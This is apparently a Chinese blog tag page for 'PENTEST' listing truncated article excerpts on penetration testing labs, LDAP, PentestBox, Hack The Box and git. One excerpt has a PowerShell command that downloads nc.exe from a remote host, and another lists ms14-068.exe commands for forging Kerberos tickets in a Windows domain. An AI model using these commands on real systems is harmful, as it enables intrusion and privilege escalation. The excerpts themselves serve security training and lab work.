首页 > TAG信息列表 > PENTEST

pentest魔法书

常用命令介绍: powershell ping扫描: 1..255 | % {echo "192.168.0.$"; ping -n 1 -w 100 192.168.0.$ | Select-String ttl} powershell下载: (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","c:\nc.exe") Win 8 and la

Mutillidae品台上使用sqlmap注入测试

Mutillidae是一个开放源码的提供安全渗透测试的Web应用程序, Mutillidae可以安装在Linux、windows xp、windows 7等平台上。下载及安装说明文档详见:mutillidae安装 在owasp top 10选项中,我们可以看到很多提供测试的页面. 这里随便选取一个sql injection地址进行测试.本文紧紧是

LDAP的学习

参考文章:https://www.anquanke.com/post/id/196238 什么是LDAP LDAP(Lightweight Directory Access Protocol),轻量目录访问协议,是一种用来查询与更新 Active Directory 的目录服务通信协议。 在AD 域服务利用 LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便用它来访问

【知识星球】pentest

先实战后理论,先挖洞后研洞 分享内容包括不限于: “SQL注射”漏洞挖掘姿势 WAF绕过小技巧 BURPSUITE漏洞检测插件 实战整理的POC集成化扫描和利用(适用护网)   追求实战派的可以入知识星球后私聊,“九星技师”安排    

pentestbox 安装后的基本设置

# 官方下载地址 https://pentestbox.org/zh/#download   # 下载完毕后解压   # bin目录下常用工具备注名    基本操作软件安装: 终端下输入:toolsmanager   # 初始化配置  ## 环境变量添加          # 如果显示乱码(中文) set LANG=zh_CN.UTF-8 set LC_ALL=zh_CN.utf

域渗透:MS14-068

1、生成TGT: net config workstation ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top 生成的票据: 2、注入TGT: 先查看自己的klist 如果有的话 那么先清理掉 否则可能会导致无法成功 klist 清理原来的票据:kli

Hack The Box Web Pentest 2019

[20 Points] Emdee five for life [by L4mpje] 问题描述:  Can you encrypt fast enough?  初始页面,不管怎么样点击Submit都会显示"Too slow!"  依据Html源码,编写Python脚本进行利用 import requestsimport hashlibimport reurl="http://docker.hackthebox.eu:34650/"r=reque

git分支操作

在sourceTree上进入命令行 1、查看当前分支 git branch     2、创建分支 git branch pentest   3、切换分支 git checkout pentest   切换分支以后,在idea上修改,提交即可   参考: https://blog.csdn.net/it_xf/article/details/80885644